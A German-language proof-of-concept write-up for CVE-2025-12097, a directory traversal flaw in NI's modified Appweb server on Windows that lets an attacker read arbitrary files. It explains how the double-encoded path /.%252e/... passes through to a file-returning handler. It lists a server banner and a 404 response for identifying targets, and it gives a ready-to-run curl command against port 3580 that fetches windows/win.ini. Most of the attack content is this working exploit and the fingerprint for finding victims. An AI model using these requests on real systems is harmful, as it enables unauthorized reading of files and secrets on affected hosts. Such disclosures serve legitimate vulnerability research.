
Proof-of-Concept-Exploit für CVE-2025-12097, eine Directory-Traversal-Sicherheitslücke im NI-modifizierten Appweb-Server, die das Auslesen beliebiger Dateien auf Windows-Systemen ermöglicht.
Die NI-Modifikation des Appweb-Servers enthält eine Directory-Traversal-Schwachstelle, die es einem Angreifer ermöglicht, beliebige Dateien auf dem Server zu lesen.
Der URI-Pfad /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini wird umgewandelt in:
pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808 was ein gültiger URI ist und Appweb diese Anfrage nicht blockiert. Dies wird dann an einen benutzerdefinierten Handler übergeben, der in diesem Fall den Inhalt jeder angeforderten Datei zurückgibt.
Aufgrund der Natur der betroffenen Software sind die betroffenen Geräte ausschließlich Microsoft Windows-Systeme.
Höchste beobachtete angreifbare Version: 12.0.0.
Die betroffenen Geräte können anhand der folgenden Merkmale identifiziert werden:
Serverantwort auf /
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126
<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>
Um diese Schwachstelle auszunutzen, können Sie den folgenden Befehl verwenden:
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
Sie sehen den Inhalt der Datei win.ini, wenn das Ziel angreifbar ist.